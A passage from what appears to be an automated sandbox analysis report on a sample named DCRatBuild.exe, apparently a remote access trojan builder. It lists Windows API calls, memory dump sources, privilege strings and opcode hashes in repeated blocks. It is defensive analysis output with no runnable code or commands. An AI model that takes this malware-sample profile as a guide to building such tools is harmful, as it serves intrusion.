                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 2148572870-0
                                  • Opcode ID: 635b3e8b332a4d501ea51defeb08b27359e00f1eb2179da5eb5b8301c499e1eb
                                  • Instruction ID: 353b18ab58fb4f555d56cc7776e6d661ffec0d7a27f4073bd76283a45e0f7288
                                  • Opcode Fuzzy Hash: 635b3e8b332a4d501ea51defeb08b27359e00f1eb2179da5eb5b8301c499e1eb
                                  • Instruction Fuzzy Hash: 57F03C72A05219ABCB205BA2DC4CEDBBF7DEF52391F008012F606D2110E6348545DBA1
                                  APIs
                                  • _wcschr.LIBVCRUNTIME ref: 008EC435
                                    • Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CompareString_wcschr
                                  • String ID: <$HIDE$MAX$MIN
                                  • API String ID: 2548945186-3358265660
                                  • Opcode ID: 7ee6067067c972680d51f26a1c7f944a5ee8d590f0b854ad76462b743b95c33f
                                  • Instruction ID: 07866468dea42ffa739af1403d17243dc765afd1ae65092561657584e1047ff8
                                  • Opcode Fuzzy Hash: 7ee6067067c972680d51f26a1c7f944a5ee8d590f0b854ad76462b743b95c33f
                                  • Instruction Fuzzy Hash: 9231A372D0028DAADF25DA5ACC45EEB77BDFB56704F004066FA05D6090EBB09FC5CA51
                                  APIs
                                  • LoadBitmapW.USER32(00000065), ref: 008EADFD
                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 008EAE22
                                  • DeleteObject.GDI32(00000000), ref: 008EAE54
                                  • DeleteObject.GDI32(00000000), ref: 008EAE77
                                    • Part of subcall function 008E9E1C: FindResourceW.KERNEL32(008EAE4D,PNG,?,?,?,008EAE4D,00000066), ref: 008E9E2E
                                    • Part of subcall function 008E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,008EAE4D,00000066), ref: 008E9E46
                                    • Part of subcall function 008E9E1C: LoadResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E59
                                    • Part of subcall function 008E9E1C: LockResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                  • String ID: ]
                                  • API String ID: 142272564-3352871620
                                  • Opcode ID: f9161e2d6e017c6a378e3463e1efaba2d906c68114bbe559cd31efce52ff0cf5
                                  • Instruction ID: 08ae4db1a8dff3297cf6bd8d563650e1c0fc0c4cf3787a70a26a255cca5197a0
                                  • Opcode Fuzzy Hash: f9161e2d6e017c6a378e3463e1efaba2d906c68114bbe559cd31efce52ff0cf5
                                  • Instruction Fuzzy Hash: 3C0126365402A6A7C710676A9C06ABF7B79FB83F41F080010FD40E7291DFB28C159AB2
                                  APIs
                                    • Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                    • Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
                                  • EndDialog.USER32(?,00000001), ref: 008ECCDB
                                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008ECCF1
                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 008ECD05
                                  • SetDlgItemTextW.USER32(?,00000068), ref: 008ECD14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ItemText$DialogWindow
                                  • String ID: RENAMEDLG
                                  • API String ID: 445417207-3299779563
                                  • Opcode ID: 0b223bebbcabfb5c79c9b12a29da044708d7d51da67f439e996f48705de05090
                                  • Instruction ID: e6729f443fa05ae22e54cc8b12d00f456dbd2892968129e83e4004ad2c285604
                                  • Opcode Fuzzy Hash: 0b223bebbcabfb5c79c9b12a29da044708d7d51da67f439e996f48705de05090
                                  • Instruction Fuzzy Hash: D7012832B9C3547ED5218FA59D08FA73BACFB5B742F200411F385E21E0C66299069B65
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008F7573,00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002), ref: 008F75E2
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008F75F5
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,008F7573,00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002), ref: 008F7618
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 39f79ef515af24b46ba29c50aa517de0aca009e39533f5fca50ae79d4d96de90
                                  • Instruction ID: 0f95ef8dbbc972aee2656fc40822c31429dd2874bc470f0d3fe1147e978ef392
                                  • Opcode Fuzzy Hash: 39f79ef515af24b46ba29c50aa517de0aca009e39533f5fca50ae79d4d96de90
                                  • Instruction Fuzzy Hash: 07F0A43161D51CBFDB159BA4DC09BAEBFB8EF04715F008158F905E2150DB348E40DA50
                                  APIs
                                    • Part of subcall function 008E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
                                    • Part of subcall function 008E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2
                                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008DEB92
                                  • GetProcAddress.KERNEL32(009181C0,CryptUnprotectMemory), ref: 008DEBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                  • API String ID: 2141747552-1753850145
                                  • Opcode ID: 9e34683ce067c99f57bda90ecf66c29be1ec5db4282596cfc32f86a99fdaace4
                                  • Instruction ID: 2eb8373f728c1b7b8b94cf2ea73685877a80677e0b5e19c8e69ec0f3592a605a
                                  • Opcode Fuzzy Hash: 9e34683ce067c99f57bda90ecf66c29be1ec5db4282596cfc32f86a99fdaace4
                                  • Instruction Fuzzy Hash: 64E04F71415741DEDB309F399808B42BFE8AB14718F00C91EE4E6E3280D6F4D5809B60
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 9b6fcc5167bee92ed90a7b89f42f6116921aa0cc6dda50fc3cb9f561351d96d6
                                  • Instruction ID: 943f1589f4dfddeb0d237f062a7ee49048eae4bcfa3861d606a812467c5f2e19
                                  • Opcode Fuzzy Hash: 9b6fcc5167bee92ed90a7b89f42f6116921aa0cc6dda50fc3cb9f561351d96d6
                                  • Instruction Fuzzy Hash: 2B41C232A003089FEB24DF78C881A6EB7A5FF89714F5545A9E615EB341DB31ED01CB81
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 008FB619
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008FB63C
                                    • Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008FB662
                                  • _free.LIBCMT ref: 008FB675
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008FB684
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                  • String ID:
                                  • API String ID: 336800556-0
                                  • Opcode ID: 21a1527270a4fd7ea3847115ac7efdbc8dda0cfdfea032eca020759ec4a5b4e8
                                  • Instruction ID: 1415069cd83812ff8dc8a93c3614944403e8db852459bcbdebaa917fe02e7268
                                  • Opcode Fuzzy Hash: 21a1527270a4fd7ea3847115ac7efdbc8dda0cfdfea032eca020759ec4a5b4e8
                                  • Instruction Fuzzy Hash: 480184B2605619BF6321167AAC8CC7B6A6DFEDABA43254229BA04C7110DF64CD0195B1
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,008F895F,008F85FB,?,008F8FD3,00000001,00000364,?,008F3713,00000050,?,00910EE8,00000200), ref: 008F902E
                                  • _free.LIBCMT ref: 008F9063
                                  • _free.LIBCMT ref: 008F908A
                                  • SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F9097
                                  • SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F90A0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: de19bd860408fb874ed4c1961de0603b0bbace8698908deccb2ccf8d7a869619
                                  • Instruction ID: 0f5bd4db40d8dfaca3923c195e60cf7b54b71998a72549cf351defbaad965119
                                  • Opcode Fuzzy Hash: de19bd860408fb874ed4c1961de0603b0bbace8698908deccb2ccf8d7a869619
                                  • Instruction Fuzzy Hash: 3501F472509E0CAFC3226779AC85B3B262DFBD03757240024F759D2252EE64CC016566
                                  APIs
                                    • Part of subcall function 008E0A41: ResetEvent.KERNEL32(?), ref: 008E0A53
                                    • Part of subcall function 008E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008E0A67
                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 008E078F
                                  • CloseHandle.KERNEL32(?,?), ref: 008E07A9
                                  • DeleteCriticalSection.KERNEL32(?), ref: 008E07C2
                                  • CloseHandle.KERNEL32(?), ref: 008E07CE
                                  • CloseHandle.KERNEL32(?), ref: 008E07DA
                                    • Part of subcall function 008E084E: WaitForSingleObject.KERNEL32(?,000000FF,008E0A78,?), ref: 008E0854
                                    • Part of subcall function 008E084E: GetLastError.KERNEL32(?), ref: 008E0860
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                  • String ID:
                                  • API String ID: 1868215902-0
                                  • Opcode ID: 81231512d2c766f9419fe8fb0d054d21dafe8f22822a50a12bbaf075dfda2862
                                  • Instruction ID: 03a198a0bd2b53419eb5e4fb968735d3eba6651e6467d63b50ffc06c843db394
                                  • Opcode Fuzzy Hash: 81231512d2c766f9419fe8fb0d054d21dafe8f22822a50a12bbaf075dfda2862
                                  • Instruction Fuzzy Hash: FE01B571444744EFC7219B69DC84FC6BBFDFB4A710F008929F15A82160CBB66A44DF90
                                  APIs
                                  • _free.LIBCMT ref: 008FBF28
                                    • Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
                                    • Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506
                                  • _free.LIBCMT ref: 008FBF3A
                                  • _free.LIBCMT ref: 008FBF4C
                                  • _free.LIBCMT ref: 008FBF5E
                                  • _free.LIBCMT ref: 008FBF70
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: fcaeb58d9e88c76a5a80ed162a282bbc0dbc6a28935bd322581e0dd660bd17f7
                                  • Instruction ID: b7bcd1a5da94259a1a4d045ff920c63b2e4927ca432411df6662ac748db68874
                                  • Opcode Fuzzy Hash: fcaeb58d9e88c76a5a80ed162a282bbc0dbc6a28935bd322581e0dd660bd17f7
                                  • Instruction Fuzzy Hash: 63F0F933518609EBC720EB78EE86C2A73E9FA107107644C49F209D7950CF20FC809E69
                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008EAC85
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EAC96
                                  • IsDialogMessageW.USER32(00010494,?), ref: 008EACAA
                                  • TranslateMessage.USER32(?), ref: 008EACB8
                                  • DispatchMessageW.USER32(?), ref: 008EACC2
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Message$DialogDispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 1266772231-0
                                  • Opcode ID: 57d074a6548ec5c7bd2ec1d9aa11f54dd63ac627b19173d8a43be000b299a311
                                  • Instruction ID: b5bf2898e1073014939628e418c0f5765b7093bb817c34eb0b3d8f5e3a77fab2
                                  • Opcode Fuzzy Hash: 57d074a6548ec5c7bd2ec1d9aa11f54dd63ac627b19173d8a43be000b299a311
                                  • Instruction Fuzzy Hash: 95F03071D15229AB8B249BE2EC4CDEB7F6CEF066517404415F405D2150EB34E509DBB1
                                  APIs
                                  • _free.LIBCMT ref: 008F807E
                                    • Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
                                    • Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506
                                  • _free.LIBCMT ref: 008F8090
                                  • _free.LIBCMT ref: 008F80A3
                                  • _free.LIBCMT ref: 008F80B4
                                  • _free.LIBCMT ref: 008F80C5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 814abc74c147ecfe3182d2d5611f7ba73ed7d6810059c1303e6c2a50ba64c6a9
                                  • Instruction ID: 9f93567e2614005241b48f09a5520d2cb1981216fdb801d9fa6d8c589f3b4d4b
                                  • Opcode Fuzzy Hash: 814abc74c147ecfe3182d2d5611f7ba73ed7d6810059c1303e6c2a50ba64c6a9
                                  • Instruction Fuzzy Hash: 80F05EB5829629CFC7116F39BC024263BA5FB247203184A4AF610D7AB0CF310851BFC6
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 008F76FD
                                  • _free.LIBCMT ref: 008F77C8
                                  • _free.LIBCMT ref: 008F77D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                  • API String ID: 2506810119-119056061
                                  • Opcode ID: 0097f7ad720923bb24a901ba54ab41f41abd5a71aa8f522161aff650d1c1707b
                                  • Instruction ID: c3d6b732032a39f1248f39f8391eae5557723b9814a1ed86c1db3d9fd0b79439
                                  • Opcode Fuzzy Hash: 0097f7ad720923bb24a901ba54ab41f41abd5a71aa8f522161aff650d1c1707b
                                  • Instruction Fuzzy Hash: 42318F71A1821CEFEB21EFA9DC819BEBBECFB94314B2440A6E604D7211D6704E40DB91
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D7579
                                    • Part of subcall function 008D3B3D: __EH_prolog.LIBCMT ref: 008D3B42
                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008D7640
                                    • Part of subcall function 008D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 008D7C04
                                    • Part of subcall function 008D7BF5: GetLastError.KERNEL32 ref: 008D7C4A
                                    • Part of subcall function 008D7BF5: CloseHandle.KERNEL32(?), ref: 008D7C59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                  • API String ID: 3813983858-639343689
                                  • Opcode ID: 9b2743e1450dca4f90f992ed62c204ac3fc660aa8aff6647e7563641813c49d6
                                  • Instruction ID: fc87a12ccf2f8ac30b87a95d93614d81f1966ef3682c2c98d562ed2d1651b760
                                  • Opcode Fuzzy Hash: 9b2743e1450dca4f90f992ed62c204ac3fc660aa8aff6647e7563641813c49d6
                                  • Instruction Fuzzy Hash: C931A671908248AEDF20EB69EC45BEE7B78FF55354F004256F444E7252EBB18944CB62
                                  APIs
                                    • Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
                                    • Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365
